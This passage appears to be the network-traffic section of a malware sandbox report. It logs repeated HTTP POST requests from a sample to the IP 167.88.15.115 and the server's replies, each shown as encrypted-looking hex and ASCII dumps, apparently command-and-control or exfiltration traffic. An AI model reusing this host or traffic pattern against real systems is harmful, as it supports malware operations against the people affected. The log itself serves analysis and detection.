Aug 28, 2021 00:05:58.167855024 CEST	1610	OUT	Data Raw: 79 c8 b8 aa 2e 17 11 49 f9 b2 b7 6c f3 4d 43 49 55 bb ac 9f a2 28 39 e8 24 e7 3f cf 3d e0 fa 5d 65 8f 1e 9d e6 b8 98 13 74 e6 a2 f9 08 f3 e9 fd 26 30 6f 5d 50 60 54 51 90 cf 86 45 d7 41 0c 1a b7 5b 07 64 2f a4 62 9c 23 9a 2b ba 85 3f e0 2f fd 40 Data Ascii: y.IlMCIU(9$?=]et&0o]P`TQEA[d/b#+?/@r;2S:4C;5QXGNbKk`5Axp)?cX(_[ngjU>U(n3a#ZV?81gn>{/sha&/1tB,@_
Aug 28, 2021 00:05:58.555870056 CEST	1640	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 355 Connection: keep-alive Data Raw: 6f 05 fc 99 be c7 2a 18 92 35 d3 15 f7 8a 30 ea fa 5e bd 4f 33 ac 5a cc 87 52 01 ff 7d 49 46 16 0d 74 03 83 dc c5 65 ec 21 0f 0c 66 7b 81 69 bc b1 8f d9 0f 51 69 08 35 01 3e f5 74 ab bd fa 6b 40 21 3f d8 dc 0a 03 a4 6b dc a7 1e 10 ea 7c f8 5d ad fd 50 ee d8 06 3f d8 58 c4 f6 fb 21 33 a5 d9 ab ba 77 b6 ac 8f 6c b2 cd b3 13 55 57 6c d1 37 0c e6 d6 44 f6 fa 9a 49 30 60 b4 92 7a 83 37 e7 50 e9 dd 38 7a 07 0a f3 45 f4 74 75 c6 7c c0 30 24 a2 55 d3 15 4b 7f b5 e4 e4 3e 1a 8e 41 45 97 01 00 51 ff 8d 92 81 3c 7b 72 e5 a2 9f ca b9 6e 81 e4 15 08 9d 1f 34 cf 38 9d 9e d7 80 76 60 90 be 75 23 b4 b3 bc 79 71 52 81 6d 7c 5f d1 da 0f a7 8c bc 7c c2 06 0d 39 03 f5 b8 84 85 e5 ea f0 59 3d 52 8b f4 d6 f6 06 56 a6 aa 9d d9 be ee fd dc 91 d5 ee 66 16 cb 45 ed 9e 53 a7 a6 05 72 94 05 ee 8e c8 a4 0b 46 68 1e 8c d7 af d6 e3 d6 3f 50 db 97 2a de e9 04 1d d4 a0 30 ba 6f ea 3d 82 ea 84 b9 4d fa a2 38 8e 22 4e 0c ce 31 0f 58 46 6f f2 3e 0d bf 60 b6 dd 31 d6 b6 2d b3 a6 e4 dc 58 e6 4e bd ef d3 93 e6 40 34 12 ef 38 76 89 d3 b4 b5 2b 0b 38 92 48 0f f1 4c f5 9e 1b a2 a8 fa 05 16 Data Ascii: o50^O3ZR}IFte!f{iQi5>tk@!?k\|]P?X!3wlUWl7DI0`z7P8zEtu\|0$UK>AEQ<{rn48v`u#yqRm\|_\|9Y=RVfESrFh?P0o=M8"N1XFo>`1-XN@48v+8HL
Aug 28, 2021 00:05:58.566859007 CEST	1640	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 261
Aug 28, 2021 00:05:58.692398071 CEST	1640	OUT	Data Raw: 2f 48 71 69 21 1e e7 25 5a 11 14 26 15 49 86 76 55 45 47 10 4d a8 e4 e8 ba c9 0d ea ea 77 af 6d ed 26 c8 ca a6 59 7f ea 5e f8 38 98 59 11 be d6 3c 47 c8 be 2d 7d df 86 62 87 ad 56 12 fc 3a e2 61 a6 38 ed 7f ba cf fb c4 5c b0 54 71 4d 90 a9 0b 35 Data Ascii: /Hqi!%Z&IvUEGMwm&Y^8Y<G-}bV:a8\TqM5@pFC+Ukd^#o=e>AfKh];z=ru->M'>W8M _A-0P]&T1,3O'%CdF-Z:Z}M:
Aug 28, 2021 00:05:59.078629017 CEST	1642	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 56757 Connection: keep-alive Data Raw: 4e de 63 62 c9 4e 43 42 02 bd 76 42 30 6d 09 ee 48 eb c5 43 06 55 bc b9 08 cb 24 7f 97 b1 ec ed f0 a6 c5 9c d3 dc a8 a8 1e 4f 42 ab 23 55 c3 c0 e5 20 c7 73 c9 07 2b 09 3d bb 71 37 de 08 a7 2e 5b 10 e3 20 bc be 67 66 9a 1c 57 cc c6 83 f5 07 f2 a4 81 f5 2f 7d 09 43 49 34 1d 75 83 94 3a 5a 55 31 a1 a9 ae 02 c8 e7 63 28 b1 a9 75 15 9d 82 b4 09 c4 4c b4 30 90 1e 7c ab f1 0c 6d e6 3c c5 57 d4 fb 7f 02 be da 4d 99 bd 0d 7e 39 57 cc cd 2e 7d 8d b1 3c 51 c2 da 80 6c 6e 1a f1 7b c0 0e ae de 47 bd 2e cb 5c 85 9d 48 e1 fb f2 53 cb 1f 01 25 b9 a3 ac ba ec 04 10 83 92 7e ca 63 7e 0b 2e 74 8d 61 4d 51 ea 55 6b bd 42 39 15 50 a0 6b a1 f3 c9 ce ff e1 85 22 e6 0e 06 18 66 e9 47 63 f7 04 54 9b 00 95 cf 0b 5a 1c c3 7c 8c f4 da c5 61 01 16 1c ab 4f cd 11 45 70 83 41 93 44 1e b1 b3 77 78 87 10 26 08 dd 80 87 c8 8a b8 ad 3f 0f a4 e8 f4 a6 54 59 38 cb 08 ee 25 05 a0 96 5f 30 9f b1 55 f6 61 0a c2 7d 59 26 aa 6b e9 d4 93 8f ee 7f 51 80 e6 ca a5 4b 05 91 19 d8 d3 fd 24 6e 9b e6 77 7f 49 4c 65 5c 25 85 1e c7 57 55 2f de 33 6d 95 47 23 7e cc 22 ee 26 f7 c0 df 10 e4 e7 57 e7 74 e4 b5 7f 9c ac 40 db 0f e0 9d 76 db ce f3 8a ab 97 a1 96 06 0f b9 0e 3e bf d2 e5 1d 22 4f 66 84 48 db a8 e1 e1 3d 22 21 29 1c 1f 89 f9 89 11 19 25 be 8c 65 7e ea de e4 e8 f8 52 d2 f7 2b 18 15 1b 11 93 fb aa 25 71 2c 85 82 20 6c 4a e3 63 87 11 ba 07 d7 39 74 82 98 77 3b 21 10 c0 6e 0f 1d b1 5d c5 5d 8b 86 17 27 2a a3 57 f7 ef 60 0b 41 d6 76 b0 04 4e 2a a5 4f 93 d6 7b df 73 e1 b8 c7 3c e0 51 71 c6 93 1a d1 9e ef b7 78 07 b1 a8 65 d9 f7 3b 50 01 a5 c9 e4 4b 76 fb 6b 85 05 23 10 28 9e be e0 20 7c 88 d9 96 1e 93 71 1b 8e f6 33 5c 70 9a ac 49 63 ab b4 47 c6 a1 7d 60 f0 00 05 29 c8 d7 a0 2b 21 02 b6 01 5a 0e 3b 14 9a 64 e0 10 c1 64 b0 21 43 ca 73 d9 f1 08 39 72 fd b2 41 76 e6 c7 d3 04 ce f4 2a 87 85 25 46 91 9a 68 86 d5 b3 6c af af d1 ee 61 3d 30 c5 02 f6 26 42 96 94 6b eb 20 87 39 65 76 53 03 e6 a2 73 99 ff 49 a8 3a 3b 72 e9 ae 28 a7 a5 b7 02 fe 96 d9 cc 48 77 2f 5e b7 08 8c f8 be 7e 0c ac 9d e3 fd 1a 8f bb a6 88 00 e9 91 78 67 7f 23 b9 06 df 8c 1a 92 40 28 3a 07 86 cc e0 1d 97 7f df 5a bd 0e 3c 66 e5 79 f9 79 79 db 1d ef 6c d1 a1 88 70 7e b3 20 82 e3 b6 3a 59 5f 85 58 dc 1c 60 46 2b 3f fb d8 33 ba 82 73 b4 d5 44 e1 74 ad 72 22 4c b9 79 2e 0e 43 0b 6a 43 8b 79 66 75 75 2e 06 a9 f4 ce 6a 0e 6f 6e cc 22 72 d9 1c d3 fa d9 f3 55 ee 6c 45 bf b4 1a 8b b1 b5 dd 46 bb 4d 9d a3 ac 96 af 57 f2 5e 01 96 20 7d ce e8 db 0e d9 07 61 8a a5 86 c6 5c c6 1f 95 b7 fe 6d 50 af 17 81 ba 6a 62 bb 03 19 e3 ed ba 0c 0b 96 e5 62 3d 3d 92 42 e6 33 c5 7f 92 78 5d 21 6f c4 f6 2f 55 85 da 3f 01 74 bf 8c d0 ce 5f c7 11 fe 35 cb 15 de a5 97 0c 39 31 27 64 32 81 1a 9a 4b e0 c1 8c 54 e0 82 81 ab ff ec 88 64 46 60 d5 b0 b7 34 f4 e7 06 4c 34 24 01 c5 65 37 95 1e 18 f3 ac 1e e3 28 d4 bc 52 74 ac 4e ee 59 63 9b e0 c3 1f 1a 00 09 ea 38 8e 5c 09 6d 82 2d 13 65 79 4d e4 79 e8 45 4e 02 c9 4a 2c f4 5f 7e 00 14 e9 cc b7 23 f6 8b 6f c3 c3 0c e2 9d ac 73 5f a4 de 75 7e 22 42 81 52 6b 25 9e 85 40 ed 85 32 e6 06 36 79 fb cf 1a 62 9f 9c 33 1a d4 b9 d5 45 2c 9a aa b9 fd 1e 82 69 5b 2c 33 bf 7e 6c 96 15 fa 97 e1 19 7d 99 0a 4b ab b0 68 31 82 14 4c b8 9d b4 44 3e 8b 88 64 2c 7e 74 15 5f f5 68 ff fa 70 5a da 18 60 c8 9c ec 95 1a da fa 5b 17 d3 4d a9 ca c4 5a 97 b5 db 4e 2c 53 d4 76 60 45 59 90 a0 a1 fb 42 5a 7b f8 6d 07 bc 62 c6 87 70 73 f4 9a 01 12 58 b2 e2 ec 5e 26 43 17 85 b4 b8 9a f2 93 c1 96 07 65 d5 9e dd 98 89 e8 43 30 ee fc 06 6e f9 bd da 3f 30 af 56 c9 33 8c 18 ad e3 f7 24 6b 15 06 81 52 87 71 5b ea 2e 9c 9b 36 1c 4c be e2 a7 06 73 e7 3f 60 d8 7d 8a f2 47 1c 60 db 2d 9b 2c d6 3f a4 2a 09 86 8b 10 46 e4 0c 34 fb a3 f9 ef aa e4 74 ba 9d 8d 52 24 3f 71 b2 7e 7a 6e 38 3e 86 16 fd 06 a9 a6 52 2d 27 ff ef c3 ad 1e be 43 96 37 f2 4c b6 d1 Data Ascii: NcbNCBvB0mHCU$OB#U s+=q7.[ gfW/}CI4u:ZU1c(uL0\|m<WM~9W.}<Qln{G.\HS%~c~.taMQUkB9Pk"fGcTZ\|aOEpADwx&?TY8%_0Ua}Y&kQK$nwILe\%WU/3mG#~"&Wt@v>"OfH="!)%e~R+%q, lJc9tw;!n]]'W`AvNO{s<Qqxe;PKvk#( \|q3\pIcG}`)+!Z;dd!Cs9rAv%Fhla=0&Bk 9evSsI:;r(Hw/^~xg#@(:Z<fyyylp~ :Y_X`F+?3sDtr"Ly.CjCyfuu.jon"rUlEFMW^ }a\mPjbb==B3x]!o/U?t_591'd2KTdF`4L4$e7(RtNYc8\m-eyMyENJ,_~#os_u~"BRk%@26yb3E,i[,3~l}Kh1LD>d,~t_hpZ`[MZN,Sv`EYBZ{mbpsX^&CeC0n?0V3$kRq[.6Ls?`}G`-,?F4tR$?q~zn8>R-'C7L
Aug 28, 2021 00:05:59.078705072 CEST	1643	IN	Data Raw: 5c de 3f bd f1 21 3d 5a 9f c8 86 57 7a 61 d3 f8 3f a5 ed 99 59 49 83 21 13 7f 10 4d 51 ad d7 47 b6 17 25 43 4f b4 9e cc 3f f1 01 e8 4e 44 18 40 16 3c e8 d9 6a 27 56 f2 d9 93 a4 cf f5 1e eb f9 02 71 32 51 d0 c4 ec 7a a3 bf 5e e6 7b bc 9f b6 76 0a Data Ascii: \?!=ZWza?YI!MQG%CO?ND@<j'Vq2Qz^{v3R3YTUrc1h<L$z;nu9K5[oN~IJ\|1>+y\|d"/ \|69<=/LnY8642]HzNaA,]
Aug 28, 2021 00:05:59.078772068 CEST	1644	IN	Data Raw: 33 9e e6 55 9a 39 10 89 2c ac 20 bf b9 7d 89 41 ff 78 0a ce d5 ba c0 17 24 45 fb 88 3b 23 97 22 36 1b 66 a3 09 a0 8d 6b 7f 71 73 39 18 64 45 d9 6c 04 4e 03 73 33 61 bd b4 92 73 ca 7b dc 6c 24 be d1 82 8b 0f c3 55 4a 4c 8a c7 e2 b0 21 54 d6 89 2f Data Ascii: 3U9, }Ax$E;#"6fkqs9dElNs3as{l$UJL!T/mrfWi>*iFRqP (4T;ilnd8AEk@EMZq.0nL.nO^!.Fzd,P'k8q,)!sr4vW@}2GO&?Hw:51mVD
Aug 28, 2021 00:05:59.078811884 CEST	1646	IN	Data Raw: ba 98 3c ba de 11 4f d4 8d 85 d5 ab 75 1c 41 88 e4 1b f5 c2 cf d9 5b 4b dc 1f 3e cc 21 b6 ac 52 fe b2 f3 01 5c 79 53 6b 72 c7 c2 2d f6 6f 99 4c 1a e2 fc 88 36 af e1 a3 24 15 1f 03 8d 27 5e 7c d9 4a 9f 7d b8 ed 04 35 3b a4 75 a9 af 19 a9 c2 ee d8 Data Ascii: <OuA[K>!R\ySkr-oL6$'^\|J}5;ua lkNp8hxo[%,gK~D\|H1uF{&m@5\w`[HN(?"e-YB%<:B-`z+$CX
Aug 28, 2021 00:05:59.078855991 CEST	1647	IN	Data Raw: d9 0e 3d 99 d8 8f 52 27 3c 40 5e 67 99 d5 18 63 7e 99 22 4c 77 ef d0 85 f1 2d dd b2 f6 1c ef 39 58 ec f5 16 f5 25 d7 06 88 9d 50 e2 02 ac c5 e3 02 36 f1 d4 22 81 9a 1a 50 e6 05 14 2b 92 ad 40 b9 7b 2b 4c 86 e9 e9 27 a3 28 39 55 6a 0f 50 64 f2 e2 Data Ascii: =R'<@^gc~"Lw-9X%P6"P+@{+L'(9UjPdIB!8+iT5#m"zkkY&)i*e$>485{dc;BM85Z]Mr(yF0s{eE09a@
Aug 28, 2021 00:05:59.078917980 CEST	1649	IN	Data Raw: 1e 94 1e e3 98 fa c4 31 ad 9b be 5b 4a 7d f7 5f 7f f4 58 83 16 44 b2 e1 08 40 1d 20 cc 68 cd 1b a4 63 45 b0 12 1d 2a d1 ac ea 63 af 81 95 d7 5c 5a 5f 0c 86 d5 8e c1 70 f3 4a 8b 74 2e ff da 8a 26 df 66 c8 b7 f0 2e 62 69 3c c6 c0 3a 5a 04 81 e7 db Data Ascii: 1[J}_XD@ hcE*c\Z_pJt.&f.bi<:Z3zJb'+:RXzI2+>h_wWIZoEXfX?Iu6Y;PF\|LK[[(`$5iDsJ"$CN8+&@e?"
Aug 28, 2021 00:05:59.078963041 CEST	1649	IN	Data Raw: 7d 7f 81 63 21 ab 6e ce c7 51 b5 0f 7d 28 cb d9 35 b9 46 f9 25 27 4d 94 db 05 33 3f 95 d5 4b d0 5d f1 b9 19 49 da 8e 53 30 50 0a 03 5b ab 9c e5 d0 3a ee ee 3a 1c 77 52 6b 88 cc 7e cf d1 24 2e 48 65 5a 09 a2 df 99 ab 5c 67 16 16 00 57 89 e1 aa 8d Data Ascii: }c!nQ}(5F%'M3?K]IS0P[::wRk~$.HeZ\gWg{%n8el$tEqY"CPl\Hu4 chU{GlS^o+QYl6
Aug 28, 2021 00:05:59.079014063 CEST	1650	IN	Data Raw: b9 a3 c2 fa 71 e1 c6 fa 06 4a ed 56 e9 f6 0b c4 12 74 06 9d 94 39 46 45 29 9d 9b c7 42 a1 8f 6c 71 a6 9e 31 3f 0b 10 84 7e 22 11 f7 27 09 34 86 3c 54 d7 39 c0 33 92 04 06 97 bf d3 e4 7d 8f d4 c0 80 f1 c9 0a 39 b4 be aa 8e 8f 52 20 e9 a4 c6 38 23 Data Ascii: qJVt9FE)Blq1?~"'4<T93}9R 8#%Ln%ts#i>DP'y_+2q T JD;<KMl!~;+i^[0+u\w&?V^6L^v#E\|WA-kUA4Z`*$
Aug 28, 2021 00:05:59.079061031 CEST	1652	IN	Data Raw: ad 2e 4d c2 6a c0 63 be 7f 4f f8 ef 6c d3 0b 73 a4 f5 56 ef 30 28 0a 66 54 fc 2c 4a 0c f6 51 cc 47 3b 7b a0 26 a2 21 9c ac 3c ec 8d 42 63 97 33 04 4c bf ab 2d ad 63 ea fe ce 2b db 33 b3 a8 03 17 47 1d e7 67 e2 9b 85 93 26 ce 7b 46 ae 13 f9 5d e2 Data Ascii: .MjcOlsV0(fT,JQG;{&!<Bc3L-c+3Gg&{F]M<3U=ydiJemnA:C,E1=+eFo!^&AKROOOcPKlCIz[B,9'~<eX%4dzaB:h'~#
Aug 28, 2021 00:05:59.079138041 CEST	1653	IN	Data Raw: f8 5e 34 30 19 bf d5 a8 58 99 46 14 9f 38 91 e4 45 09 e2 23 a9 74 1d 51 47 fe c7 6f 38 64 06 a4 21 c6 72 88 11 f4 61 21 23 50 e4 80 24 ba da b2 90 1f 6d 1f 2e e6 14 98 50 07 39 6e 55 29 16 df ac e9 d4 18 8d 14 49 68 80 39 c1 ef fb 17 4e cf 74 c2 Data Ascii: ^40XF8E#tQGo8d!ra!#P$m.P9nU)Ih9Nt$"hZ<`*%3\;K^S$m,1nssWAt!WxSpXt^e\c>rbaSNAdSH<!n{J;wim"v:
Aug 28, 2021 00:05:59.204245090 CEST	1653	IN	Data Raw: 16 70 af fe f5 56 b7 89 44 9b f4 73 d6 f3 41 00 ec 27 d3 a5 a3 2c 33 7e ca e6 a1 8e 64 f8 5b ca b5 6d cc 59 d2 f8 0a 4c dc d0 dd 02 ce e7 f3 c9 b8 85 c9 3c 19 62 b7 30 7f 32 f0 e9 03 96 2c 3f b9 e5 49 99 c0 41 ed ef c5 28 8a 5a f0 0d 62 83 2b 27 Data Ascii: pVDsA',3~d[mYL<b02,?IA(Zb+'
Aug 28, 2021 00:06:42.101011992 CEST	6386	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 327
Aug 28, 2021 00:06:42.228207111 CEST	6386	OUT	Data Raw: 21 f6 af f8 e4 77 43 22 12 d4 48 cd 09 7b 1a 46 10 ef d6 04 9d 8a ab cc b8 91 89 47 94 10 2f b9 2f 6d f4 39 8f 1e 2d 64 17 35 b7 24 e1 11 49 6b cb 16 ab 57 72 73 a8 95 4b e1 40 54 ec fb 8c 02 a6 8d 9e 9b 85 df b5 f0 c3 72 ec 69 d2 87 e9 a8 48 1f Data Ascii: !wC"H{FG//m9-d5$IkWrsK@TriHzcH`v}Uq_@F&7: %WO,X$[c&]N%$iC?Rye.nbQ;:;]_ph+uVoTG)>3:fm
Aug 28, 2021 00:06:42.616494894 CEST	6388	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 111 Connection: keep-alive Data Raw: 10 5c f5 7e bc 56 cd ff a6 f8 ef ac b4 ce 80 fe 26 29 7d 4e e3 c5 3b 39 1f be 26 6c e5 3c 00 27 9b 21 31 28 85 c4 a1 b5 d8 77 c5 24 1b 9b 95 5b 2c 19 20 02 3b cf 15 7b 2e 72 42 b8 20 39 1e 3c a2 68 a9 38 69 26 46 0e fc e1 fa 4f 17 b2 5d b2 32 b4 89 e9 2a 42 95 73 3c 8e 42 92 4a fc 15 40 43 ae 98 b9 22 98 25 c9 a6 43 e1 01 bb af f5 Data Ascii: \~V&)}N;9&l<'!1(w$[, ;{.rB 9<h8i&FO]2*Bs<BJ@C"%C
Aug 28, 2021 00:06:42.725797892 CEST	6389	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 671
Aug 28, 2021 00:06:42.850528955 CEST	6390	OUT	Data Raw: 93 da 07 54 98 b8 0f 88 0a 66 3d 04 20 14 32 12 9f a6 2b 43 c5 17 65 a0 67 68 46 b4 5b bd 11 a8 ad f3 23 3f 51 15 25 78 f6 3d 27 82 de ae a3 68 70 3b 4f 7e d2 05 14 7c 75 66 eb 31 72 59 2e 4b 56 94 55 2c f0 f1 c0 8a 81 b1 4b 89 ef e2 c0 b8 c3 dc Data Ascii: Tf= 2+CeghF[#?Q%x='hp;O~\|uf1rY.KVU,KE o),KYxw}z"3mKK)b{v_KfV8Fpg-,Tbntx/"0Ki112m=#zP:tI&?G]"d@@6~8dg8cD#hxKG
Aug 28, 2021 00:06:43.241456985 CEST	6392	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 121 Connection: keep-alive Data Raw: 5c c8 ca 63 eb 8a e1 81 f2 a4 24 64 3b 68 f8 69 1c d6 1e 4e 4c 10 48 47 ce cb 2e ee ca 19 93 cf 89 90 9c 51 35 24 df a5 00 29 dd 02 d3 4a 27 d5 30 7a f5 c0 3f 56 91 0d 0f f2 f1 83 f9 2d 2d f9 6a b9 4e b2 c4 b5 58 19 d0 4f 4a 0b 36 54 70 18 5f 13 e0 ae 15 f5 4c 8c 79 19 91 f4 99 82 4b 64 f3 f7 7f 33 6d 5d c9 a1 e5 84 fb 58 a4 2c 51 d7 95 82 c5 b8 7a ec 44 c4 cd Data Ascii: \c$d;hiNLHG.Q5$)J'0z?V--jNXOJ6Tp_LyKd3m]X,QzD
Aug 28, 2021 00:06:43.350855112 CEST	6393	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 281
Aug 28, 2021 00:06:43.475486040 CEST	6393	OUT	Data Raw: 4b 5e 1e dd 7c eb 1e c0 4e 80 e0 75 68 d6 0c c6 e0 09 58 bd f4 e8 b2 8c d6 95 1c 80 07 ba 07 83 62 17 e0 f1 75 af 48 75 1c 68 91 fd 2c cb 00 99 ed 72 70 d1 c4 82 01 63 24 c6 1e 88 48 43 46 06 b2 c9 b4 e2 67 a6 17 be c9 64 76 b7 ec ca f8 e9 2f a4 Data Ascii: K^\|NuhXbuHuh,rpc$HCFgdv/\|A"NK@{FivabvBBVr\;B ZL[.)JX{({\B~r8uW/tm!Roe:"L9-$B
Aug 28, 2021 00:06:43.876807928 CEST	6395	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 211 Connection: keep-alive Data Raw: d5 da a8 31 d2 74 67 e7 86 a8 e6 a3 d0 a5 b3 50 a7 c1 f8 ef 36 27 f9 aa 2a 89 8c 13 43 e7 c2 c4 e2 ab 55 e8 14 dc 93 77 18 47 4c 18 40 dc 72 e3 45 99 8a 25 79 27 c0 14 7f c2 4e 30 14 c2 0d 93 5a e2 56 ac ca 59 6c c8 53 90 22 5c 0c 16 a4 44 29 08 da d2 1d 09 d6 e1 d1 57 51 03 b9 b8 d0 cd be 36 6a 09 42 5c 4b 94 1f a6 44 5a 56 0b 5e 88 66 f6 9e cd e5 47 5c 3b 9d fa 41 4f 86 f5 c2 70 56 98 00 3f 8a 45 85 ca 91 8c 45 23 ca 1b 98 24 0a ec 41 28 91 e1 70 94 e9 fa da 90 30 07 73 3f 1e 3e 34 4d 1c 9c b9 9a 40 6f b6 11 5a fb 7f 79 63 e5 6e ce d2 4c 21 c7 78 51 e5 10 77 00 33 ff 04 8e 2d 2e 24 31 39 4f a0 bc c6 85 8d c7 3d 50 0d a8 0d Data Ascii: 1tgP6'*CUwGL@rE%y'N0ZVYlS"\D)WQ6jB\KDZV^fG\;AOpV?EE#$A(p0s?>4M@oZycnL!xQw3-.$19O=P
Aug 28, 2021 00:06:43.995717049 CEST	6396	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 704
Aug 28, 2021 00:06:44.120234966 CEST	6397	OUT	Data Raw: 92 cf 6e b3 56 82 4e fc af 5c 89 71 fe c4 33 2f ef c7 7f 9a 78 5c d3 29 39 8b 0b ae 49 55 6b eb 2c 0b aa 86 05 c1 17 bf 33 cc d6 de ea 37 3a c6 39 72 6b 02 37 32 71 37 fa 46 7b ca 78 9f b4 5b ef 9d 46 f4 1b ac 2b 2f b0 bf 67 ab 85 f4 3d 02 51 44 Data Ascii: nVN\q3/x\)9IUk,37:9rk72q7F{x[F+/g=QDvjtGLH{MEG=Pwyz5)qL\#ldw=.k<ieiT4hn>NkdgWk#X/>6ecu-E_#%:YcLl=n0;i
Aug 28, 2021 00:06:44.501871109 CEST	6399	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 120 Connection: keep-alive Data Raw: bf 41 ed e6 4e e9 ae 02 77 39 4d 8a 84 e6 96 74 0b bf 93 44 f4 c0 5c 15 af 9c e1 15 0f 87 67 fb 50 e7 17 39 8e ba f6 00 95 17 48 3f 79 3f 38 9e 2e 15 58 cf 51 20 cc 8f 13 7f e3 d8 90 e0 8c 0d 61 14 5b fa 50 13 ef 8b b0 1b 75 90 5b 30 a7 6f 2b 54 d2 a4 67 e3 a5 fd 85 b3 a2 10 92 f4 c7 a2 c5 10 8e 53 72 a9 1a 84 41 81 65 be ab 39 fa 0c 65 0f e9 10 58 bc 15 67 Data Ascii: ANw9MtD\gP9H?y?8.XQ a[Pu[0o+TgSrAe9eXg
Aug 28, 2021 00:06:44.616595984 CEST	6400	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 268
Aug 28, 2021 00:06:44.742835999 CEST	6400	OUT	Data Raw: 6d 61 e7 07 f6 f5 f7 3b ee 15 58 60 8a 8c 8b e1 6c 75 9f 69 3a 1e d0 8e c8 06 7e a4 9f 82 39 59 9a 00 d7 2b ae b0 cd 5a 69 a5 98 11 10 4a 28 c0 72 2c 0d f3 c7 08 c9 37 e9 d8 1b a9 8f 3a 83 bb df b2 09 85 7d 12 d6 6e 0b fb fd 25 7a 42 88 e8 0a 6e Data Ascii: ma;X`lui:~9Y+ZiJ(r,7:}n%zBn\9Tom=\r^j~Z$ZliC?KDo79y,8\|pE_>+S\|Cd,<B+TZZ&g[UoN)/]- X:8
Aug 28, 2021 00:06:45.142163992 CEST	6402	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 264 Connection: keep-alive Data Raw: 10 cc d9 06 0c a0 17 52 32 73 04 1f ee 73 81 a9 a8 93 ab fc 1f d6 13 27 fc 07 4f ae 0b 5f 32 6f 21 32 c0 fe 0b a4 d2 17 ed bf ac 8b e3 4e 30 49 33 38 18 06 56 29 f3 ea 9c 21 a5 f8 48 80 60 13 14 35 03 9f 74 17 56 f9 bb 83 28 19 b8 9c 61 63 90 c6 43 c5 81 3b bd 01 c3 55 c4 92 92 59 83 6d bf f3 0c 34 e0 3d 22 a8 71 ce 68 8a 16 09 92 08 c2 2b 9b 5f e8 31 b0 82 18 8c 19 08 5d 53 0e b7 93 67 a1 c4 3b 4d ab a8 f2 68 e4 72 52 6a 0b b9 b8 84 d4 c3 c7 7a 68 5f 5f d1 79 01 ec 03 dc d7 0d d4 60 dd 66 e2 07 8e 47 60 be 37 20 36 4a ba bc 9f 66 67 cc ed df 00 ca 78 ce ab dd f4 3c 53 41 82 83 bb 1e 40 72 92 58 7f 64 93 5f ac 33 d9 15 1e e1 57 ed 6b d7 e5 6d 90 7a 13 6d 33 71 3a f2 ef 45 44 d2 6e 8e 4a 05 1c e3 b4 81 40 6f 08 b3 e1 9d bf b1 b9 3a fc 83 2c 6c f5 d0 c4 e7 9f 16 2e 76 07 32 f4 68 a8 Data Ascii: R2ss'O_2o!2N0I38V)!H`5tV(acC;UYm4="qh+_1]Sg;MhrRjzh__y`fG`7 6Jfgx<SA@rXd_3Wkmzm3q:EDnJ@o:,l.v2h
Aug 28, 2021 00:06:45.257414103 CEST	6402	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 745
Aug 28, 2021 00:06:45.385761976 CEST	6403	OUT	Data Raw: 38 21 36 3a d1 28 57 48 b4 6b 59 d8 e5 f4 7c 6d 68 ef ec b0 4c 39 15 ac a0 16 43 1e 2d 3e c3 f2 17 7e 4d 4f e5 60 e7 92 bc 25 1d 40 c1 09 a6 be 9e 4f 54 13 fa e6 b2 fe 0c 88 98 bc e3 3a 1b 76 a7 65 c1 68 a7 2d 86 08 08 5a f3 27 1c d4 ea 98 6f 84 Data Ascii: 8!6:(WHkY\|mhL9C->~MO`%@OT:veh-Z'o/ND^,\F?qL7M`=mZ)@qv=R1mW<?jN0nm'RW^hx]Q\vta[,N\D74]mC'[];1O
Aug 28, 2021 00:06:45.780677080 CEST	6406	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 222 Connection: keep-alive Data Raw: 0c c0 03 90 a1 17 12 62 e7 f4 af 5e 9d 02 04 c2 70 28 ea 3e 79 9b ef 58 8a 16 fe e8 9c 63 48 bf 6b d5 d1 aa f0 b6 af 50 1f 35 62 3f e1 2d ef 55 03 e3 17 05 30 01 7f 42 71 92 42 58 f9 e8 80 e7 55 cc d8 e1 39 80 c5 15 15 1a 79 30 52 31 0e de 38 48 87 68 8e 5c 45 33 8e 9b 41 97 51 8c 69 78 b0 64 02 0f 31 dc 9d 33 7f 68 d8 2b 96 32 ee 6c 4f 9d a5 29 4c d9 5f 3a f8 0f 36 fe 30 dc ac cf f1 e8 95 55 c1 14 57 a7 f5 9d 18 e4 44 00 6e 1c 50 28 ce 34 f5 e2 31 00 29 ad 87 eb 96 d1 3e 83 6f 82 e4 a8 40 9d 2c c6 b6 96 78 7b 6c ca fc c1 90 ce 02 38 8f dd c1 76 92 c3 15 9c de 33 d1 81 7f b6 93 89 ae 54 69 3c 5b 4e 15 e2 0d f3 a2 bb dc 24 31 f0 bb 6a 7e 0c 63 20 42 95 42 4d Data Ascii: b^p(>yXcHkP5b?-U0BqBXU9y0R18Hh\E3AQixd13h+2lO)L_:60UWDnP(41)>o@,x{l8v3Ti<[N$1j~c BBM
Aug 28, 2021 00:06:45.903943062 CEST	6407	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 244
Aug 28, 2021 00:06:46.029818058 CEST	6408	OUT	Data Raw: 0c cf 29 79 97 94 1d 32 9f 00 7d 11 94 92 5a 56 7e 5b e1 b8 f7 7f 69 ee d4 ac 95 4c c7 76 39 56 cb ad 5a 39 ad aa 00 be 00 f0 6e 41 1e 36 55 0a 0c 26 28 c2 33 06 6f 3a 28 2b 5f 53 ba 74 9b 1c c5 3c da 51 e6 d8 4f 19 81 24 3c f7 20 9b c0 29 d7 24 Data Ascii: )y2}ZV~[iLv9VZ9nA6U&(3o:(+_St<QO$< )$wq?q1U7vC=;A&{WNkA\|8il8kbTlP(~x'DpUOXB=q?BrS",aZnoO#B
